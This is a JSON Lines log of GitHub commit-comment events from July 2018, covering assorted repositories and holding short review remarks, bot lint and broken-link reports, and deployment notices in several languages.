{"id":"7968701745","type":"CommitCommentEvent","actor":{"login":"Stoakes"},"repo":{"name":"ouest-insa/Incipio"},"payload":{"comment":{"id":29715731,"position":7,"line":6,"path":"src/Mgate/SuiviBundle/Resources/views/Etude/Buttons/Suiveur.html.twig","commit_id":"75d8684b351e4fe537fbe9ef9c830816e8281993","created_at":"2018-07-16T05:22:49Z","updated_at":"2018-07-16T05:22:49Z","author_association":"NONE","body":"`width: auto;` m'a l'air de faire l'affaire."}},"created_at":"2018-07-16T05:22:49Z"}
{"id":"7968702417","type":"CommitCommentEvent","actor":{"login":"charles008"},"repo":{"name":"charles008/cataloging-records"},"payload":{"comment":{"id":29715733,"position":null,"line":null,"path":null,"commit_id":"f22f630b330aed77b28a6e6549829db5dd70f6e3","created_at":"2018-07-16T05:23:11Z","updated_at":"2018-07-16T05:23:11Z","author_association":"OWNER","body":"[504501p.pdf](https://github.com/charles008/cataloging-records/files/2196590/504501p.pdf)\r\n[504501p.pdf](https://github.com/charles008/cataloging-records/files/2196590/504501p.pdf)\r\n"}},"created_at":"2018-07-16T05:23:11Z"}
{"id":"7968715553","type":"CommitCommentEvent","actor":{"login":"atris"},"repo":{"name":"atris/presto"},"payload":{"comment":{"id":29715765,"position":58,"line":58,"path":"presto-main/src/main/java/com/facebook/presto/sql/planner/iterative/rule/AddPartialAggregationBelowSemiJoin.java","commit_id":"b4df66499d0bfff329c3b6edcbbe7ac4691a742c","created_at":"2018-07-16T05:29:59Z","updated_at":"2018-07-16T05:29:59Z","author_association":"OWNER","body":"Fixed, thanks"}},"created_at":"2018-07-16T05:29:59Z"}
{"id":"7968719276","type":"CommitCommentEvent","actor":{"login":"idsb3t1"},"repo":{"name":"idsb3t1/UI-ys1int-KEEP-TC"},"payload":{"comment":{"id":29715772,"position":null,"line":null,"path":null,"commit_id":"5b9a0a585964400537b6d3a87222484189410115","created_at":"2018-07-16T05:31:51Z","updated_at":"2018-07-16T05:31:51Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.stage1.bluemix.net/devops/toolchains/ee7af0c7-eb4b-4808-84ae-65a1ebf892f4?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\"): [Delivery Pipeline](https://console.stage1.bluemix.net/devops/pipelines/9602ba9a-db4c-42c8-81d1-69655e515efe?env_id=ibm%3Ays1%3Aus-south \"UI-ys1int-KEEP-TC\") deployed [UI-ys1int-KEEP-TC](https://github.com/idsb3t1/UI-ys1int-KEEP-TC/releases/tag/deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180716-053150 \"deploy-ibm-ys1-us-south-idsb3t2-us.ibm.com-dev-20180716-053150\") to [dev](https://console.stage1.bluemix.net/apps/e0173942-fbb5-42df-a8ff-cca49f037241?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:idsb3t2@us.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-16T05:31:51Z"}
{"id":"7968719604","type":"CommitCommentEvent","actor":{"login":"waxz"},"repo":{"name":"waxz/catkin_startup"},"payload":{"comment":{"id":29715773,"position":null,"line":null,"path":null,"commit_id":"87ca5cd38de5cf776c4f92952635605535c6aeee","created_at":"2018-07-16T05:32:01Z","updated_at":"2018-07-16T05:32:01Z","author_association":"OWNER","body":"- [ ] how to sort each point with the same order\r\n\r\n- [ ] how to tune parameter to reject false match\r\n\r\n- [ ] how to choose each posiibility"}},"created_at":"2018-07-16T05:32:01Z"}
{"id":"7968720224","type":"CommitCommentEvent","actor":{"login":"Error323"},"repo":{"name":"LeelaChessZero/lc0"},"payload":{"comment":{"id":29715774,"position":null,"line":null,"path":null,"commit_id":"a530848dad2817dc592e0167f29274677c0884e0","created_at":"2018-07-16T05:32:16Z","updated_at":"2018-07-16T05:32:16Z","author_association":"MEMBER","body":"It was an LC0_MINOR mistake (:\n\nOp ma 16 jul. 2018 03:17 schreef dubslow <notifications@github.com>:\n\n> Glad to see this critical work make it into main! Promotion inc (never\n> mind faster loading times)!\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/LeelaChessZero/lc0/commit/a530848dad2817dc592e0167f29274677c0884e0#commitcomment-29715016>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAEpOeilhYruK4GQAAHU6mqROcZBXj1tks5uG-mRgaJpZM4VQdrF>\n> .\n>\n"}},"created_at":"2018-07-16T05:32:16Z"}
{"id":"7968725906","type":"CommitCommentEvent","actor":{"login":"aflores1010"},"repo":{"name":"aflores1010/Tutorial-Web"},"payload":{"comment":{"id":29715787,"position":null,"line":null,"path":null,"commit_id":"a2de7e2dcc6e10be6c0dce6372565f66d4608a45","created_at":"2018-07-16T05:35:09Z","updated_at":"2018-07-16T05:35:09Z","author_association":"OWNER","body":"Las letras no se ven, deberian ser blancas"}},"created_at":"2018-07-16T05:35:09Z"}
{"id":"7968727383","type":"CommitCommentEvent","actor":{"login":"okmrtty"},"repo":{"name":"okmrtty/example"},"payload":{"comment":{"id":29715789,"position":null,"line":null,"path":null,"commit_id":"ac8410120e3d59b609305f32111bb715bec0243f","created_at":"2018-07-16T05:35:54Z","updated_at":"2018-07-16T05:35:54Z","author_association":"OWNER","body":"日本語に対応しています。"}},"created_at":"2018-07-16T05:35:54Z"}
{"id":"7968728632","type":"CommitCommentEvent","actor":{"login":"eggsung"},"repo":{"name":"eggsung/GitDemo2"},"payload":{"comment":{"id":29715790,"position":null,"line":null,"path":null,"commit_id":"ac36ff8c370e00b89f9992fd9e65b770a31ae827","created_at":"2018-07-16T05:36:29Z","updated_at":"2018-07-16T05:36:29Z","author_association":"OWNER","body":"add text"}},"created_at":"2018-07-16T05:36:29Z"}
{"id":"7968732444","type":"CommitCommentEvent","actor":{"login":"bogutski"},"repo":{"name":"bogutski/gt-test"},"payload":{"comment":{"id":29715793,"position":2,"line":1,"path":"index.js","commit_id":"38ca81ec8fd998dd93b047aa55dcc6fad26e1c3b","created_at":"2018-07-16T05:38:20Z","updated_at":"2018-07-16T05:38:20Z","author_association":"OWNER","body":"add !"}},"created_at":"2018-07-16T05:38:20Z"}
{"id":"7968733933","type":"CommitCommentEvent","actor":{"login":"technikodev"},"repo":{"name":"technikodev/share-doc-to-classroom"},"payload":{"comment":{"id":29715796,"position":null,"line":null,"path":null,"commit_id":"b3853f8b652d356e3b0a2af7863fdf898cf8f422","created_at":"2018-07-16T05:39:03Z","updated_at":"2018-07-16T05:39:03Z","author_association":"OWNER","body":"I forgot to upload 0.9 to github ¯\\_(ツ)_/¯"}},"created_at":"2018-07-16T05:39:03Z"}
{"id":"7968734082","type":"CommitCommentEvent","actor":{"login":"Jgunguk"},"repo":{"name":"Jgunguk/jgunguk.github.io"},"payload":{"comment":{"id":29715797,"position":null,"line":null,"path":null,"commit_id":"cfdf4f0b183a8c48d7397572e82ae562e60712c9","created_at":"2018-07-16T05:39:08Z","updated_at":"2018-07-16T05:39:08Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-16T05:39:08Z"}
{"id":"7968740532","type":"CommitCommentEvent","actor":{"login":"lgritz"},"repo":{"name":"meshula/openexr"},"payload":{"comment":{"id":29715804,"position":4,"line":44,"path":"OpenEXR/config.windows/OpenEXRConfig.h","commit_id":"e7bcb896b6553ad86667e78cac19b91a57786825","created_at":"2018-07-16T05:42:14Z","updated_at":"2018-07-16T05:42:14Z","author_association":"NONE","body":"Duplicate line?"}},"created_at":"2018-07-16T05:42:14Z"}
{"id":"7968742802","type":"CommitCommentEvent","actor":{"login":"qiaoyan"},"repo":{"name":"TextureGroup/Texture"},"payload":{"comment":{"id":29715806,"position":null,"line":null,"path":null,"commit_id":"0b9f12716e47447ea8b39190aca81ec490ff86e5","created_at":"2018-07-16T05:43:24Z","updated_at":"2018-07-16T05:43:24Z","author_association":"NONE","body":"Hi, this commit bring the following error message in two of my projects, any idea?\r\n![screen shot 2018-07-16 at 1 41 42 pm](https://user-images.githubusercontent.com/1080270/42744318-3310dd2c-88fe-11e8-9a80-d0a787f88417.png)\r\n\r\n"}},"created_at":"2018-07-16T05:43:24Z"}
{"id":"7968742895","type":"CommitCommentEvent","actor":{"login":"Kinka"},"repo":{"name":"nodepp/smartnode"},"payload":{"comment":{"id":29715807,"position":5,"line":249,"path":"app/src/main/java/com/nodepp/smartnode/activity/BathHeaterActivity.java","commit_id":"80d0e9c3261c43a976178e2c518cad831e03ed20","created_at":"2018-07-16T05:43:26Z","updated_at":"2018-07-16T05:43:26Z","author_association":"COLLABORATOR","body":"变量格式应该统一，java通常都是驼峰式，就不写混杂这种下划线的了。"}},"created_at":"2018-07-16T05:43:26Z"}
{"id":"7968746278","type":"CommitCommentEvent","actor":{"login":"bmintz"},"repo":{"name":"khazhyk/dango.py"},"payload":{"comment":{"id":29715813,"position":null,"line":null,"path":null,"commit_id":"64918a307f46837b5c133fb7b610b97d039a3b55","created_at":"2018-07-16T05:45:08Z","updated_at":"2018-07-16T05:45:08Z","author_association":"NONE","body":"ikr"}},"created_at":"2018-07-16T05:45:08Z"}
{"id":"7968748426","type":"CommitCommentEvent","actor":{"login":"alejandrosofia"},"repo":{"name":"alejandrosofia/mobile"},"payload":{"comment":{"id":29715817,"position":null,"line":null,"path":null,"commit_id":"3e505672e06504a7768cab663ba2f04fe8c713d3","created_at":"2018-07-16T05:46:08Z","updated_at":"2018-07-16T05:46:08Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Work on basic Design Doc whitesheet and screens for app --](https://trello.com/c/nvHBgnj6/6-work-on-basic-design-doc-whitesheet-and-screens-for-app)"}},"created_at":"2018-07-16T05:46:08Z"}
{"id":"7968748942","type":"CommitCommentEvent","actor":{"login":"dotarmin"},"repo":{"name":"CasparCG/server"},"payload":{"comment":{"id":29715819,"position":null,"line":null,"path":null,"commit_id":"1499d11d90ac8ad3a437bc2ae1746f84e6e33bc9","created_at":"2018-07-16T05:46:22Z","updated_at":"2018-07-16T05:46:22Z","author_association":"MEMBER","body":"Hi!\r\n\r\nI was checking out some stuff as I usually do before going on vacation and noticed that build fails with this commit. MSBuild is giving a warning in `image_kernel.cpp` when converting from `size_t -> GLsizei` because of possible data loss. This warning is treated as error in MSBuild."}},"created_at":"2018-07-16T05:46:22Z"}
{"id":"7968750915","type":"CommitCommentEvent","actor":{"login":"dakuo"},"repo":{"name":"dakuo/mmviz"},"payload":{"comment":{"id":29715822,"position":null,"line":null,"path":null,"commit_id":"9723c6750042150090ca82ff5bae0586f5afd022","created_at":"2018-07-16T05:47:17Z","updated_at":"2018-07-16T05:47:17Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/35bf4419-6f67-43cc-920a-2e01e679034d?env_id=ibm%3Ayp%3Aus-south \"mmviz\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/732b4045-094c-418e-9c09-c6113f7eb397?env_id=ibm%3Ayp%3Aus-south \"mmviz\") deployed [mmviz](https://github.com/dakuo/mmviz/releases/tag/deploy-ibm-yp-us-south-dakuowang-test-20180716-054716 \"deploy-ibm-yp-us-south-dakuowang-test-20180716-054716\") to [test](https://console.bluemix.net/apps/6c99943e-5a08-41fb-8bd4-f9129164015b?env_id=ibm:yp:us-south \"ibm:yp:us-south:dakuowang:test\"), including this commit"}},"created_at":"2018-07-16T05:47:17Z"}
{"id":"7968753471","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29715825,"position":null,"line":null,"path":null,"commit_id":"2a38d6e40414a9d256332394bbd2e88912f8479a","created_at":"2018-07-16T05:48:28Z","updated_at":"2018-07-16T05:48:28Z","author_association":"MEMBER","body":"@eFrysTon This looks like it worked for #427, is this what you wanted?"}},"created_at":"2018-07-16T05:48:28Z"}
{"id":"7968762221","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29715833,"position":38,"line":629,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"07a8f98a1aa1d1f76bc178b8068dbbd8e347cac4","created_at":"2018-07-16T05:52:32Z","updated_at":"2018-07-16T05:52:32Z","author_association":"COLLABORATOR","body":"Could this being written together be a typo in the Uyghur?"}},"created_at":"2018-07-16T05:52:32Z"}
{"id":"7968764564","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"yaeinjung/10minutes2pandas"},"payload":{"comment":{"id":29715837,"position":4,"line":10,"path":"index.ipynb","commit_id":"40d3b835f414bb862a2777c1824094edc40549df","created_at":"2018-07-16T05:53:37Z","updated_at":"2018-07-16T05:53:37Z","author_association":"NONE","body":"@yaeinjung 작업을 잘 해주셨네요. 👍 풀리퀘를 생성해서 머지 해주시면 데잇걸즈 공동 저장소에 반영될거에요."}},"created_at":"2018-07-16T05:53:37Z"}
{"id":"7968769023","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29715842,"position":null,"line":null,"path":null,"commit_id":"2a38d6e40414a9d256332394bbd2e88912f8479a","created_at":"2018-07-16T05:55:40Z","updated_at":"2018-07-16T05:55:40Z","author_association":"CONTRIBUTOR","body":"Yes, that's the change I pushed. I just don't know why github now lists 900 other commits belonging to dev from before the point that dev-elminster got split from dev as belonging to dev-elminster"}},"created_at":"2018-07-16T05:55:40Z"}
{"id":"7968771082","type":"CommitCommentEvent","actor":{"login":"shad0w1947"},"repo":{"name":"rohanraarora/ExpenseManagerClass"},"payload":{"comment":{"id":29715845,"position":35,"line":36,"path":"app/src/main/java/in/codingninjas/envision/expensemanager/MainActivity.java","commit_id":"b08ad9689a8042b71a815784d1da587be19aa3cb","created_at":"2018-07-16T05:56:37Z","updated_at":"2018-07-16T05:56:37Z","author_association":"NONE","body":"database create only once?"}},"created_at":"2018-07-16T05:56:37Z"}
{"id":"7968773056","type":"CommitCommentEvent","actor":{"login":"a18344214458A"},"repo":{"name":"a18344214458A/a18344214458A.github.io"},"payload":{"comment":{"id":29715847,"position":null,"line":null,"path":null,"commit_id":"1d31a45261a415eea151d262ce0ccdb768fbdf1a","created_at":"2018-07-16T05:57:34Z","updated_at":"2018-07-16T05:57:34Z","author_association":"OWNER","body":"![screenshot_2018-07-14-08-37-57-145_com termux](https://user-images.githubusercontent.com/36222950/42744579-177baca4-88bd-11e8-8424-6f9930ede2ae.png)\r\n![screenshot_2018-07-14-08-39-44-628_com termux](https://user-images.githubusercontent.com/36222950/42744580-17be9dd4-88bd-11e8-9a5b-bd9cbabd4c5f.png)\r\n![screenshot_2018-07-14-08-51-48-510_com termux](https://user-images.githubusercontent.com/36222950/42744581-18060278-88bd-11e8-986e-c34e89771eb8.png)\r\n"}},"created_at":"2018-07-16T05:57:34Z"}
{"id":"7968773310","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29715849,"position":null,"line":null,"path":null,"commit_id":"2a38d6e40414a9d256332394bbd2e88912f8479a","created_at":"2018-07-16T05:57:40Z","updated_at":"2018-07-16T05:57:40Z","author_association":"MEMBER","body":"I don't know either. As long as you delete the repo and clone it again each time it does that in GitForWindows ignore it. Just do what I put in the gmail."}},"created_at":"2018-07-16T05:57:40Z"}
{"id":"7968773862","type":"CommitCommentEvent","actor":{"login":"soulmutbuttas"},"repo":{"name":"devpunks/blackhistory.io"},"payload":{"comment":{"id":29715851,"position":null,"line":null,"path":null,"commit_id":"ebc0b674723ce98c8add14aa77c921e783003492","created_at":"2018-07-16T05:57:55Z","updated_at":"2018-07-16T05:57:55Z","author_association":"COLLABORATOR","body":"I don't forget... keep it up as I sharpen my sword"}},"created_at":"2018-07-16T05:57:55Z"}
{"id":"7968774427","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"ddongule/10minutes2pandas"},"payload":{"comment":{"id":29715852,"position":70,"line":299,"path":".ipynb_checkpoints/index-checkpoint.ipynb","commit_id":"2301f443f2546cfaf7058022deae29d516c71934","created_at":"2018-07-16T05:58:11Z","updated_at":"2018-07-16T05:58:11Z","author_association":"NONE","body":"이런 문법 오류가 있는 라인은 제거해주면 ipynb 가 제대로 로드되어 보일거에요."}},"created_at":"2018-07-16T05:58:11Z"}
{"id":"7968775049","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":29715856,"position":null,"line":null,"path":null,"commit_id":"629628c38d75886a207fc7cc4a49125842bcd5c4","created_at":"2018-07-16T05:58:27Z","updated_at":"2018-07-16T05:58:27Z","author_association":"MEMBER","body":"这是在干啥？"}},"created_at":"2018-07-16T05:58:27Z"}
{"id":"7968791549","type":"CommitCommentEvent","actor":{"login":"mjkim103301"},"repo":{"name":"mjkim103301/carpool"},"payload":{"comment":{"id":29715894,"position":null,"line":null,"path":null,"commit_id":"3cd59cd9c99e7eeb198e4e465ca508718906511e","created_at":"2018-07-16T06:05:28Z","updated_at":"2018-07-16T06:05:28Z","author_association":"OWNER","body":"chatting 오류남"}},"created_at":"2018-07-16T06:05:28Z"}
{"id":"7968795058","type":"CommitCommentEvent","actor":{"login":"chandra1"},"repo":{"name":"mridhulacit/ds"},"payload":{"comment":{"id":29715896,"position":5,"line":5,"path":"2.py","commit_id":"fb302d1457c8a17a53f0d550daff37e1186d598a","created_at":"2018-07-16T06:07:05Z","updated_at":"2018-07-16T06:07:05Z","author_association":"CONTRIBUTOR","body":"Learn to write Python unit tests  https://jeffknupp.com/blog/2013/12/09/improve-your-python-understanding-unit-testing/ https://www.guru99.com/python-unit-testing-guide.html"}},"created_at":"2018-07-16T06:07:05Z"}
{"id":"7968796047","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"ddongule/10minutes2pandas"},"payload":{"comment":{"id":29715898,"position":115,"line":379,"path":".ipynb_checkpoints/index-checkpoint.ipynb","commit_id":"2301f443f2546cfaf7058022deae29d516c71934","created_at":"2018-07-16T06:07:32Z","updated_at":"2018-07-16T06:07:32Z","author_association":"NONE","body":"이 라인도 제거가 필요해요. 깃헙 편집기로 편집해 보세요 :)"}},"created_at":"2018-07-16T06:07:32Z"}
{"id":"7968796522","type":"CommitCommentEvent","actor":{"login":"Scrity1976"},"repo":{"name":"Scrity1976/exilopanel-core"},"payload":{"comment":{"id":29715899,"position":null,"line":null,"path":null,"commit_id":"77e5d333b0e4bb54f47efc5ff3ff14d898c7ccd9","created_at":"2018-07-16T06:07:44Z","updated_at":"2018-07-16T06:07:44Z","author_association":"OWNER","body":"Broken. Do not use."}},"created_at":"2018-07-16T06:07:44Z"}
{"id":"7968798830","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"ddongule/10minutes2pandas"},"payload":{"comment":{"id":29715901,"position":1190,"line":1620,"path":"index.ipynb","commit_id":"2301f443f2546cfaf7058022deae29d516c71934","created_at":"2018-07-16T06:08:38Z","updated_at":"2018-07-16T06:08:38Z","author_association":"NONE","body":"이 라인만 제거해 주시면 깃헙에서 파일 미리보기가 가능할거에요. 이 라인만 편집기를 통해 제거해 보세요. :)"}},"created_at":"2018-07-16T06:08:38Z"}
{"id":"7968799243","type":"CommitCommentEvent","actor":{"login":"Divyanbhard29"},"repo":{"name":"Divyanbhard29/Divyanshu"},"payload":{"comment":{"id":29715903,"position":null,"line":null,"path":null,"commit_id":"5ec7e1a84cfaba698355f1b1da7b1838786c2ff3","created_at":"2018-07-16T06:08:49Z","updated_at":"2018-07-16T06:08:49Z","author_association":"OWNER","body":"This is an example of showing how to change label."}},"created_at":"2018-07-16T06:08:49Z"}
{"id":"7968813403","type":"CommitCommentEvent","actor":{"login":"aihummel"},"repo":{"name":"aihummel/muffins"},"payload":{"comment":{"id":29715915,"position":null,"line":null,"path":null,"commit_id":"8fdfea13def5b54000f34e09c090464750f76b63","created_at":"2018-07-16T06:14:32Z","updated_at":"2018-07-16T06:14:32Z","author_association":"OWNER","body":"\"give\" lines have to be in [shares:share_size] format, e.g.:\r\nGive 4 students $[3:\\frac{24}{55}]$ and $[1:\\frac{28}{55}]$ and $[1:1]$\r\n\r\nThe input file can just have a bunch of that kind of line with no other formatting"}},"created_at":"2018-07-16T06:14:32Z"}
{"id":"7968814708","type":"CommitCommentEvent","actor":{"login":"Pnemonic"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29715918,"position":null,"line":null,"path":null,"commit_id":"277337f692bb134c5afebea286b1ea12aa0dd07a","created_at":"2018-07-16T06:15:06Z","updated_at":"2018-07-16T06:15:06Z","author_association":"NONE","body":"Agreed, no cretures spawned and if you manually spwn, they are in phase 0. To be able to see them as a normal player or gm off they must be in phase 171-174 (different phases of gilneas questline.) The gates dont work either."}},"created_at":"2018-07-16T06:15:06Z"}
{"id":"7968821639","type":"CommitCommentEvent","actor":{"login":"MichaelBengtsson"},"repo":{"name":"krokedil/klarna-checkout-for-woocommerce"},"payload":{"comment":{"id":29715925,"position":null,"line":null,"path":null,"commit_id":"aa81da101ca59e8f4bcd240bfe946038db8810e3","created_at":"2018-07-16T06:17:57Z","updated_at":"2018-07-16T06:17:57Z","author_association":"CONTRIBUTOR","body":"Fixes #64"}},"created_at":"2018-07-16T06:17:57Z"}
{"id":"7968825554","type":"CommitCommentEvent","actor":{"login":"rivencon"},"repo":{"name":"lanQiaoZhuJiaoTuan/testGithub"},"payload":{"comment":{"id":29715938,"position":2,"line":2,"path":"README.md","commit_id":"e787c3d50295b56f62724ce44237673b27e952cf","created_at":"2018-07-16T06:19:32Z","updated_at":"2018-07-16T06:19:32Z","author_association":"CONTRIBUTOR","body":"I'm just trying."}},"created_at":"2018-07-16T06:19:32Z"}
{"id":"7968825732","type":"CommitCommentEvent","actor":{"login":"jiabinleo"},"repo":{"name":"jiabinleo/SZ_DMTX_YZTS"},"payload":{"comment":{"id":29715939,"position":65,"line":147,"path":"index.html","commit_id":"598268862f01002720dbe7e2c6f36cc173546fb9","created_at":"2018-07-16T06:19:36Z","updated_at":"2018-07-16T06:19:36Z","author_association":"OWNER","body":"柱状图显示数值"}},"created_at":"2018-07-16T06:19:36Z"}
{"id":"7968827312","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29715940,"position":null,"line":null,"path":null,"commit_id":"5d3e10435e1f0bb3714dcbd286c7b0484095beda","created_at":"2018-07-16T06:20:13Z","updated_at":"2018-07-16T06:20:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T06:20:13Z"}
{"id":"7968827989","type":"CommitCommentEvent","actor":{"login":"hesham200053"},"repo":{"name":"hesham200053/Algorithms-4th-Edition"},"payload":{"comment":{"id":29715943,"position":null,"line":null,"path":null,"commit_id":"b66d138eec84d02f48c93f51d756e3c970a7fa33","created_at":"2018-07-16T06:20:28Z","updated_at":"2018-07-16T06:20:28Z","author_association":"OWNER","body":"try"}},"created_at":"2018-07-16T06:20:28Z"}
{"id":"7968828560","type":"CommitCommentEvent","actor":{"login":"jiabinleo"},"repo":{"name":"jiabinleo/SZ_DMTX_YZTS"},"payload":{"comment":{"id":29715944,"position":63,"line":145,"path":"index.html","commit_id":"598268862f01002720dbe7e2c6f36cc173546fb9","created_at":"2018-07-16T06:20:42Z","updated_at":"2018-07-16T06:20:42Z","author_association":"OWNER","body":"不显示0"}},"created_at":"2018-07-16T06:20:42Z"}
{"id":"7968829206","type":"CommitCommentEvent","actor":{"login":"SX-JannLee"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29715945,"position":2,"line":57,"path":"src/Illuminate/Foundation/Console/stubs/policy.stub","commit_id":"89fc8607d0b58dabdcb198452393b898af77bbe8","created_at":"2018-07-16T06:20:57Z","updated_at":"2018-07-16T06:20:57Z","author_association":"NONE","body":"mkkjj"}},"created_at":"2018-07-16T06:20:57Z"}
{"id":"7968830823","type":"CommitCommentEvent","actor":{"login":"desphilboy"},"repo":{"name":"htdebeer/SVG-cards"},"payload":{"comment":{"id":29715947,"position":1,"line":1,"path":"Changelog","commit_id":"6006b7c0c87874e11cd10a205f5e85c4996b6577","created_at":"2018-07-16T06:21:34Z","updated_at":"2018-07-16T06:21:34Z","author_association":"NONE","body":"@htdebeer  \r\nplz email me your npm id."}},"created_at":"2018-07-16T06:21:34Z"}
{"id":"7968850618","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29715974,"position":null,"line":null,"path":null,"commit_id":"35be69d487ecc22e8e26b6a0c6f43596c0f21fd0","created_at":"2018-07-16T06:28:58Z","updated_at":"2018-07-16T06:28:58Z","author_association":"NONE","body":"Comment on 35be69d487ecc22e8e26b6a0c6f43596c0f21fd0.\n\nThere are 13 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4985377849868288 | reports/nkprince007.md | 8 |\n| Broken link - unable to connect to https://fonts.googleapis.com/css?family=Roboto+Mono:300,300i,400,400i,700,700i | _layouts/report.md | 13 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/4705163153506304/ | data/locale/en/projects/use_coala.md | 24 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | _projects/automate_vulture_whitelist.md | 85 |\n| Broken link - unable to connect to https://bitbucket.org/m0hawk | _projects/vulture.md | 90 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | data/locale/en/projects/automate_vulture_whitelist.md | 81 |\n| Broken link - unable to connect to https://coala.io/newcomer | data/locale/en/faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | _projects/git_task_list.md | 62 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/lgpl | _projects/add_repo_license.md | 153 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | _projects/use_coala.md | 45 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | _projects/use_coala.md | 478 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | _projects/use_coala.md | 482 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-16T06:28:58Z"}
{"id":"7968858764","type":"CommitCommentEvent","actor":{"login":"frivoal"},"repo":{"name":"w3c/csswg-drafts"},"payload":{"comment":{"id":29715987,"position":4,"line":338,"path":"css-fonts-3/Fonts.src.html","commit_id":"951fc349f63ce196e3f9b4f4a0213db6e76b1f10","created_at":"2018-07-16T06:31:33Z","updated_at":"2018-07-16T06:31:33Z","author_association":"CONTRIBUTOR","body":"This is an editorial change (since that line never normatively defined anything), so I think that's probably OK, but if you think it's not, we can back it out for Fonts 3."}},"created_at":"2018-07-16T06:31:33Z"}
{"id":"7968860389","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/coala"},"payload":{"comment":{"id":29715990,"position":null,"line":null,"path":null,"commit_id":"1d975ce359c32ee1f08358ae6de3122ed8be6f57","created_at":"2018-07-16T06:32:10Z","updated_at":"2018-07-16T06:32:10Z","author_association":"COLLABORATOR","body":"Comment on 1d975ce359c32ee1f08358ae6de3122ed8be6f57.\n\nThere are 11 results for the section autopep8. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 8 |\n| The code does not comply to PEP8. | coalib/parsing/CliParsing.py | 15 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/CliParsing.py | 9 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/CliParsing.py | 14 |\n| E302 expected 2 blank lines, found 0 | coalib/parsing/CliParsing.py | 16 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 10 |\n| The code does not comply to PEP8. | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 11 |\n| E501 line too long (85 > 80 characters) | coalib/parsing/ConfParser.py | 16 |\n| W293 blank line contains whitespace | coalib/parsing/ConfParser.py | 18 |\n| E302 expected 2 blank lines, found 1 | coalib/parsing/ConfParser.py | 19 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-16T06:32:10Z"}
{"id":"7968860559","type":"CommitCommentEvent","actor":{"login":"ZacTonyTony"},"repo":{"name":"ishanshan/EnjoySwingDancing"},"payload":{"comment":{"id":29715991,"position":null,"line":null,"path":null,"commit_id":"11f3dd439328da88e02579fb3633b469bb85e25d","created_at":"2018-07-16T06:32:13Z","updated_at":"2018-07-16T06:32:13Z","author_association":"NONE","body":"居然有在更新  "}},"created_at":"2018-07-16T06:32:13Z"}
